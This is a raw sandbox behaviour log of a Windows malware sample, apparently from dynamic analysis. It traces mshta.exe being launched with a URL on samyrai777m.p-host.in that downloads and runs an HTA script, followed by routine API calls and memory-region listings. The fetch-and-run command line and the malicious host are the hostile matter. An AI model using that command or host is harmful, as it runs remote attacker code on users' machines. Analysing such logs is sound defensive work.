[0088.034] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0088.034] GetKeyState (nVirtKey=1) returned 1
[0088.034] GetKeyState (nVirtKey=2) returned 0
[0088.034] GetKeyState (nVirtKey=16) returned 0
[0088.034] GetKeyState (nVirtKey=17) returned 0
[0088.034] GetKeyState (nVirtKey=4) returned 0
[0088.034] GetKeyState (nVirtKey=18) returned 0
[0088.034] GetMessageTime () returned 140650
[0088.034] GetMessagePos () returned 0x20202af
[0088.034] GetMessageTime () returned 140650
[0088.034] GetMessagePos () returned 0x20202af
[0088.034] GetMessageTime () returned 140650
[0088.034] GetMessagePos () returned 0x20202af
[0088.035] GetCursorPos (in: lpPoint=0x2ae320 | out: lpPoint=0x2ae320*(x=791, y=286)) returned 1
[0088.035] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2ae320 | out: lpPoint=0x2ae320) returned 1
[0088.035] GetKeyState (nVirtKey=16) returned 0
[0088.035] GetKeyState (nVirtKey=17) returned 0
[0088.035] GetKeyState (nVirtKey=18) returned 0
[0088.035] GetKeyState (nVirtKey=160) returned 0
[0088.035] GetKeyState (nVirtKey=162) returned 0
[0088.035] GetKeyState (nVirtKey=164) returned 0
[0088.035] GetCursorPos (in: lpPoint=0x2ae320 | out: lpPoint=0x2ae320*(x=791, y=286)) returned 1
[0088.035] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2ae320 | out: lpPoint=0x2ae320) returned 1
[0088.035] GetKeyState (nVirtKey=16) returned 0
[0088.035] GetKeyState (nVirtKey=17) returned 0
[0088.035] GetKeyState (nVirtKey=18) returned 0
[0088.035] GetKeyState (nVirtKey=160) returned 0
[0088.035] GetKeyState (nVirtKey=162) returned 0
[0088.035] GetKeyState (nVirtKey=164) returned 0
[0088.036] IsWinEventHookInstalled (event=0x8005) returned 0
[0088.036] StrCmpICW (pszStr1="about:blank", pszStr2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned -7
[0088.036] StrCmpICW (pszStr1="about:blank", pszStr2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned -7
[0088.036] GetCurrentThreadId () returned 0xbc4
[0088.036] GetCurrentThreadId () returned 0xbc4
[0088.036] GetCurrentThreadId () returned 0xbc4
[0088.036] GetCurrentThreadId () returned 0xbc4
[0088.037] IntersectRect (in: lprcDst=0x2aec30, lprcSrc1=0x2aec30, lprcSrc2=0x2aec00 | out: lprcDst=0x2aec30) returned 0
[0088.037] IntersectRect (in: lprcDst=0x417300, lprcSrc1=0x417300, lprcSrc2=0x2aec20 | out: lprcDst=0x417300) returned 0
[0088.037] UnionRect (in: lprcDst=0x2af270, lprcSrc1=0x2af270, lprcSrc2=0x2af200 | out: lprcDst=0x2af270) returned 0
[0088.037] IsWinEventHookInstalled (event=0x8005) returned 0
[0088.037] GetCurrentThreadId () returned 0xbc4
[0088.037] GetCurrentThreadId () returned 0xbc4
[0088.037] GetCurrentThreadId () returned 0xbc4
[0088.039] GetMessageTime () returned 151367
[0088.039] GetMessagePos () returned 0x11e0317
[0088.039] GetCursorPos (in: lpPoint=0x2aecb0 | out: lpPoint=0x2aecb0*(x=791, y=286)) returned 1
[0088.039] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2aecb0 | out: lpPoint=0x2aecb0) returned 1
[0088.039] GetKeyState (nVirtKey=16) returned 0
[0088.039] GetKeyState (nVirtKey=17) returned 0
[0088.039] GetKeyState (nVirtKey=18) returned 0
[0088.039] GetKeyState (nVirtKey=160) returned 0
[0088.039] GetKeyState (nVirtKey=162) returned 0
[0088.039] GetKeyState (nVirtKey=164) returned 0
[0088.040] GetCursorPos (in: lpPoint=0x2aecb0 | out: lpPoint=0x2aecb0*(x=791, y=286)) returned 1
[0088.040] ScreenToClient (in: hWnd=0x10206, lpPoint=0x2aecb0 | out: lpPoint=0x2aecb0) returned 1
[0088.040] GetKeyState (nVirtKey=16) returned 0
[0088.040] GetKeyState (nVirtKey=17) returned 0
[0088.040] GetKeyState (nVirtKey=18) returned 0
[0088.040] GetKeyState (nVirtKey=160) returned 0
[0088.040] GetKeyState (nVirtKey=162) returned 0
[0088.040] GetKeyState (nVirtKey=164) returned 0
[0088.040] GetMessageTime () returned 151367
[0088.040] GetMessagePos () returned 0x11e0317
[0088.040] GetMessageTime () returned 151367
[0088.040] GetMessagePos () returned 0x11e0317
[0088.040] RevokeDragDrop (hwnd=0x10206) returned 0x0
[0088.040] GetCurrentThreadId () returned 0xbc4
[0088.040] GetWindowLongPtrW (hWnd=0x10206, nIndex=-21) returned 0x3bd780
[0088.040] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x405ba0, hWnd=0x10206, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x2af280 | out: plResult=0x2af280) returned 0x1
[0088.040] NtdllDefWindowProc_W () returned 0x0
[0088.041] GetCurrentThreadId () returned 0xbc4
[0088.041] SetWindowLongPtrW (hWnd=0x10206, nIndex=-21, dwNewLong=0x0) returned 0x3bd780
[0088.041] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 1
[0088.041] TranslateMessage (lpMsg=0x2af6c0) returned 0
[0088.041] DispatchMessageW (lpMsg=0x2af6c0) returned 0x0
[0088.041] IsWinEventHookInstalled (event=0x8005) returned 0
[0088.041] GetCurrentThreadId () returned 0xbc4
[0088.041] GetMessageW (in: lpMsg=0x2af6c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2af6c0) returned 0
[0088.041] IsWinEventHookInstalled (event=0x8005) returned 0
[0088.041] GetCurrentThreadId () returned 0xbc4
[0088.041] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x405ba0) returned 0x0
[0088.042] GetUserDefaultLCID () returned 0x409
[0088.042] GetACP () returned 0x4e4
[0088.042] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2af5a0 | out: ppURI=0x2af5a0*=0x3ad680) returned 0x0
[0088.042] IUri:GetScheme (in: This=0x3ad680, pdwScheme=0x2af4e0 | out: pdwScheme=0x2af4e0*=0x11) returned 0x0
[0088.042] IUnknown:QueryInterface (in: This=0x3ad680, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x2af4e0 | out: ppvObject=0x2af4e0*=0x3ad680) returned 0x0
[0088.042] IUnknown:Release (This=0x3ad680) returned 0x2
[0088.042] IUnknown:AddRef (This=0x3ad680) returned 0x3
[0088.043] IUnknown:Release (This=0x3ad680) returned 0x2
[0088.043] IUri:IsEqual (in: This=0x3aee60, pUri=0x3ad680, pfEqual=0x2af580 | out: pfEqual=0x2af580*=0) returned 0x0
[0088.043] IUnknown:Release (This=0x3aee60) returned 0x5
[0088.043] IUnknown:AddRef (This=0x3ad680) returned 0x3
[0088.043] IUri:GetAbsoluteUri (in: This=0x3ad680, pbstrAbsoluteUri=0x3bf290 | out: pbstrAbsoluteUri=0x3bf290*="about:blank") returned 0x0
[0088.043] IUnknown:Release (This=0x3ad680) returned 0x2
[0088.043] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x7feff5e0000
[0088.043] GetProcAddress (hModule=0x7feff5e0000, lpProcName="InternetUnlockRequestFile") returned 0x7feff5f70f4
[0088.043] InternetUnlockRequestFile (in: hLockRequestInfo=0x413ed0 | out: hLockRequestInfo=0x413ed0) returned 1
[0088.044] IUnknown:Release (This=0x3aee60) returned 0x4
[0088.044] IUnknown:Release (This=0x3aee60) returned 0x3
[0088.045] IUnknown:AddRef (This=0x3ad680) returned 0x3
[0088.045] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x3a0030) returned 0x800c0011
[0088.045] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0088.045] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2ae770 | out: ppvObject=0x2ae770*=0x7fee1044fb8) returned 0x0
[0088.045] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0088.045] IInternetProtocolInfo:ParseUrl (This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x404940, cchResult=0xc, pcchResult=0x2ae7b0, dwReserved=0x0)
[0088.049] OleUninitialize ()
[0088.050] DestroyWindow (hWnd=0x5001c) returned 1
[0088.050] PostQuitMessage (nExitCode=0)
[0088.050] DllCanUnloadNow () returned 0x0
[0088.050] DllCanUnloadNow () returned 0x0
[0088.050] DllCanUnloadNow () returned 0x1
[0088.054] FreeLibrary (hLibModule=0x7fee0880000) returned 1
[0088.054] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0
[0088.054] RtlExitUserProcess (ExitCode=0x0)
Thread:
id = 37
os_tid = 0xbd8
Thread:
id = 39
os_tid = 0xbe0
[0063.751] GetCurrentThreadId () returned 0xbe0
[0064.178] IInternetProtocolSink:ReportProgress (This=0x3ef370, ulStatusCode=0x20, szStatusText=0x0) returned 0x0
[0066.807] IInternetProtocolSink:ReportProgress (This=0x3ef370, ulStatusCode=0x1, szStatusText="www.samyrai777m.p-host.in") returned 0x0
[0066.808] GetCurrentThreadId () returned 0xbe0
[0066.808] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0066.810] IInternetProtocolSink:ReportProgress (This=0x3ef370, ulStatusCode=0x2, szStatusText="185.211.244.133") returned 0x0
[0066.810] GetCurrentThreadId () returned 0xbe0
[0066.884] IInternetProtocolSink:ReportProgress (This=0x3ef370, ulStatusCode=0xb, szStatusText=0x0) returned 0x0
[0066.988] IHttpNegotiate:OnResponse (in: This=0x3ef2f8, dwResponseCode=0xc8, szResponseHeaders="HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Tue, 24 Oct 2017 17:38:08 GMT\r\nContent-Type: application/hta\r\nConnection: keep-alive\r\nVary:User-Agent\r\n\r\n", szRequestHeaders=0x0, pszAdditionalRequestHeaders=0x0 | out: pszAdditionalRequestHeaders=0x0) returned 0x0
[0066.988] IInternetProtocolSink:ReportProgress (This=0x3ef370, ulStatusCode=0x1f, szStatusText="application/hta") returned 0x0
[0066.988] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc19a
[0066.988] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc19b
[0066.988] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc1c0
[0066.988] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc1a5
[0066.988] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc1a7
[0066.988] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc1a6
[0066.988] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc1ab
[0066.988] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc1ac
[0066.988] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc1ad
[0066.988] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc1af
[0066.988] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc1ae
[0066.988] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc1b1
[0066.988] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc1b2
[0066.988] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc1b3
[0066.988] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc1c1
[0066.988] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc1bf
[0066.988] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc1a9
[0066.988] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc1aa
[0066.988] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc1b0
[0066.988] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19
[0066.988] IInternetProtocolSink:ReportProgress (This=0x3ef370, ulStatusCode=0xe, szStatusText="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\t[2].hta") returned 0x0
[0066.988] GetCurrentProcessId () returned 0xbc0
[0066.989] IInternetProtocolSink:ReportData (This=0x3ef370, grfBSCF=0x11, ulProgress=0x1, ulProgressMax=0x0) returned 0x0
[0066.989] IUnknown:QueryInterface (in: This=0x3f1080, riid=0x7fee0f1f430*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x22cd8b8 | out: ppvObject=0x22cd8b8*=0x3f1088) returned 0x0
[0066.989] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0x1, pBuffer=0x22ce2e0*=0x0, pcbBuf=0x22cd8b0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22ce2e0*=0x61, pcbBuf=0x22cd8b0*=0xf, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0xffff, pBuffer=0x22ce3e0*=0x78, pcbBuf=0x22cd8b0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22ce3e0*=0x76, pcbBuf=0x22cd8b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0x2e, pBuffer=0x22ce0e0*=0x0, pcbBuf=0x22cd8d0*=0x100, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22ce0e0*=0x76, pcbBuf=0x22cd8d0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0x4000000b, pBuffer=0x22cd8e8*=0x0, pcbBuf=0x22cd8b0*=0x10, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22cd8e8*=0x76, pcbBuf=0x22cd8b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0xffff, pBuffer=0x22cdce0*=0x58, pcbBuf=0x22cd8b0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22cdce0*=0x76, pcbBuf=0x22cd8b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0xffff, pBuffer=0x22cdce0*=0x44, pcbBuf=0x22cd8b0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22cdce0*=0x76, pcbBuf=0x22cd8b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0xffff, pBuffer=0x22cdce0*=0x43, pcbBuf=0x22cd8b0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22cdce0*=0x76, pcbBuf=0x22cd8b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0xffff, pBuffer=0x22cdce0*=0x58, pcbBuf=0x22cd8b0*=0x400, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22cdce0*=0x76, pcbBuf=0x22cd8b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x1
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0x20000013, pBuffer=0x3ef430*=0x0, pcbBuf=0x22cd8b0*=0x4, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x3ef430*=0xc8, pcbBuf=0x22cd8b0*=0x4, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0066.993] IWinInetHttpInfo:RemoteQueryInfo (in: This=0x3f1088, dwOption=0x12, pBuffer=0x22cdbd0*=0x0, pcbBuf=0x22cd8d8*=0xf, pdwFlags=0x0, pdwReserved=0x0 | out: pBuffer=0x22cdbd0*=0x48, pcbBuf=0x22cd8d8*=0x8, pdwFlags=0x0, pdwReserved=0x0) returned 0x0
[0066.993] StrCmpICA (pszStr1="HTTP/1.0", pszStr2="HTTP/1.1") returned -1
[0066.993] IWinInetInfo:RemoteQueryOption (in: This=0x3f1088, dwOption=0x17, pBuffer=0x22cd8d4*=0x32, pcbBuf=0x22cd8b0*=0x4 | out: pBuffer=0x22cd8d4*=0x0, pcbBuf=0x22cd8b0*=0x4) returned 0x0
[0066.993] IWinInetInfo:RemoteQueryOption (in: This=0x3f1088, dwOption=0x1f, pBuffer=0x22cd8d4*=0x0, pcbBuf=0x22cd8b0*=0x4 | out: pBuffer=0x22cd8d4*=0x0, pcbBuf=0x22cd8b0*=0x4) returned 0x0
[0066.993] IWinInetInfo:RemoteQueryOption (in: This=0x3f1088, dwOption=0x42, pBuffer=0x22cd900*=0xcc, pcbBuf=0x22cd8cc*=0x2cc | out: pBuffer=0x22cd900*=0xcc, pcbBuf=0x22cd8cc*=0x2cc) returned 0x0
[0066.994] IWinInetInfo:RemoteQueryOption (in: This=0x3f1088, dwOption=0xfffe, pBuffer=0x3ef4a0*=0x0, pcbBuf=0x22cd8b0*=0x8 | out: pBuffer=0x3ef4a0*=0xd0, pcbBuf=0x22cd8b0*=0x8) returned 0x0
[0066.994] IUnknown:Release (This=0x3f1088) returned 0x5
[0066.994] GetCurrentThreadId () returned 0xbe0
[0066.994] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1
[0066.994] GetCurrentThreadId () returned 0xbe0
[0066.994] GetCurrentThreadId () returned 0xbe0
[0066.994] MulDiv (nNumber=1, nNumerator=4000, nDenominator=1) returned 4000
[0066.994] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0066.995] GetCurrentThreadId () returned 0xbe0
[0066.995] IInternetProtocol:Read (in: This=0x3f1080, pv=0x421930, cb=0x2000, pcbRead=0x22ced00 | out: pv=0x421930, pcbRead=0x22ced00*=0xcf1) returned 0x0
[0066.996] IInternetProtocol:Read (in: This=0x3f1080, pv=0x422621, cb=0x130f, pcbRead=0x22ced00 | out: pv=0x422621, pcbRead=0x22ced00*=0x0) returned 0x1
[0066.996] IInternetProtocolSink:ReportData (This=0x3ef370, grfBSCF=0x15, ulProgress=0xcf1, ulProgressMax=0x0) returned 0x0
[0066.996] IInternetProtocolSink:ReportResult (This=0x3ef370, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0
[0067.005] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pSecMgr=0x0) returned 0x1
[0067.012] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22cea98 | out: phkResult=0x22cea98*=0x138) returned 0x0
[0067.012] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x22ceaa0 | out: phkResult=0x22ceaa0*=0x444) returned 0x0
[0067.012] RegOpenKeyExW (in: hKey=0x444, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x22cea28 | out: phkResult=0x22cea28*=0x0) returned 0x2
[0067.012] RegOpenKeyExW (in: hKey=0x138, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x22cea28 | out: phkResult=0x22cea28*=0x0) returned 0x2
[0067.012] RegCloseKey (hKey=0x0) returned 0x6
[0067.012] RegCloseKey (hKey=0x0) returned 0x6
[0067.012] RegCloseKey (hKey=0x138) returned 0x0
[0067.012] RegCloseKey (hKey=0x444) returned 0x0
[0067.012] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X9OHK109\\t[2].hta", pBuffer=0x22cebb0, cbSize=0xc8, pwzMimeProposed="application/hta", dwMimeFlags=0x6, ppwzMimeOut=0x22ceb58, dwReserved=0x0 | out: ppwzMimeOut=0x22ceb58*="application/hta") returned 0x0
[0067.013] CoTaskMemFree (pv=0x40eb20)
[0067.013] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pSecMgr=0x0) returned 0x1
[0067.013] StrCmpNIW (lpStr1="applic", lpStr2="image/", nChar=6) returned -1
[0067.013] GetCurrentThreadId () returned 0xbe0
[0067.013] SetEvent (hEvent=0x210) returned 1
[0067.013] GetCurrentThreadId () returned 0xbe0
[0067.013] MulDiv (nNumber=3312, nNumerator=4000, nDenominator=3313) returned 3999
[0067.013] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
Thread:
id = 40
os_tid = 0xbe4
[0063.770] GetCurrentThreadId () returned 0xbe4
Thread:
id = 41
os_tid = 0xbe8
[0063.811] GetCurrentThreadId () returned 0xbe8
Thread:
id = 46
os_tid = 0xbfc
[0063.857] GetCurrentThreadId () returned 0xbfc
Thread:
id = 47
os_tid = 0x784
[0063.932] GetCurrentThreadId () returned 0x784
Thread:
id = 67
os_tid = 0x82c
[0064.143] GetCurrentThreadId () returned 0x82c
Thread:
id = 69
os_tid = 0x84c
[0064.179] GetCurrentThreadId () returned 0x84c
[0064.180] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x7fee0880000
[0064.182] CoInitialize (pvReserved=0x0) returned 0x0
[0064.182] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x927c0) returned 0x0
[0067.014] GetTickCount () returned 0x2003e
[0067.014] IInternetProtocolRoot:Terminate (This=0x3f1080, dwOptions=0x0) returned 0x0
[0067.014] IUnknown:Release (This=0x3ef2f8) returned 0x7
[0067.014] IUnknown:Release (This=0x3ef2f8) returned 0x6
[0067.014] IUnknown:Release (This=0x3ef300) returned 0x5
[0067.014] IUnknown:Release (This=0x3ef2f0) returned 0x4
[0067.014] IUnknown:Release (This=0x3ef370) returned 0x3
[0067.014] IUnknown:Release (This=0x3ef370) returned 0x2
[0067.014] GetCurrentThreadId () returned 0x84c
[0067.051] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x424950, cbMultiByte=3313, lpWideCharStr=0x425968, cchWideChar=3313 | out: lpWideCharStr="") returned 3313
[0067.052] IUnknown:AddRef (This=0x3aee60) returned 0x11
[0067.052] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x367f770 | out: lpCPInfo=0x367f770) returned 1
[0067.052] IUnknown:AddRef (This=0x3c4cd0) returned 0x4
[0067.052] IUnknown:AddRef (This=0x3aee60) returned 0x12
[0067.052] IUnknown:QueryInterface (in: This=0x3aee60, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x367f7b0 | out: ppvObject=0x367f7b0*=0x3aee60) returned 0x0
[0067.052] IUnknown:Release (This=0x3aee60) returned 0x12
[0067.052] IUnknown:AddRef (This=0x3aee60) returned 0x13
[0067.052] IUri:GetScheme (in: This=0x3aee60, pdwScheme=0x367f7e0 | out: pdwScheme=0x367f7e0*=0x2) returned 0x0
[0067.055] IUnknown:Release (This=0x3aee60) returned 0x12
[0067.055] PostMessageW (hWnd=0x10202, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1
[0067.070] GetTickCount () returned 0x2007c
[0067.070] GetTickCount () returned 0x2007c
[0067.071] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x927c0) returned 0x0
[0088.003] GetTickCount () returned 0x24f47
[0088.003] WaitForSingleObject (hHandle=0x210, dwMilliseconds=0x927c0) returned 0x0
[0088.047] CoUninitialize ()
[0088.047] FreeLibraryAndExitThread (hLibModule=0x7fee0880000, dwExitCode=0x0)
[0088.047] GetCurrentThreadId () returned 0x84c
Thread:
id = 71
os_tid = 0x878
[0064.226] GetCurrentThreadId () returned 0x878
Thread:
id = 74
os_tid = 0x308
[0066.811] GetCurrentThreadId () returned 0x308
Thread:
id = 78
os_tid = 0x6b4
[0067.510] GetCurrentThreadId () returned 0x6b4
[0067.675] GetCurrentThreadId () returned 0x6b4
Process:
id = "5"
image_name = "mshta.exe"
filename = "c:\\windows\\system32\\mshta.exe"
page_root = "0x3c511000"
os_pid = "0xbc8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x9b0"
cmd_line = "\"C:\\Windows\\System32\\mshta.exe\" http://www.samyrai777m.p-host.in/t/t.php?thread=0"
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 731
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 732
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 733
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 734
start_va = 0x50000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 735
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 736
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 737
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 738
start_va = 0xff9d0000
end_va = 0xff9dffff
entry_point = 0xff9d2c24
region_type = mapped_file
name = "mshta.exe"
filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")
Region:
id = 739
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 740
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 741
start_va = 0x7fffffd3000
end_va = 0x7fffffd3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 742
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 743
start_va = 0x2d0000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 744
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 745
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 746
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 747
start_va = 0x150000
end_va = 0x1b6fff
entry_point = 0x150000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 748
start_va = 0x230000
end_va = 0x23ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 749
start_va = 0x3d0000
end_va = 0x4cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
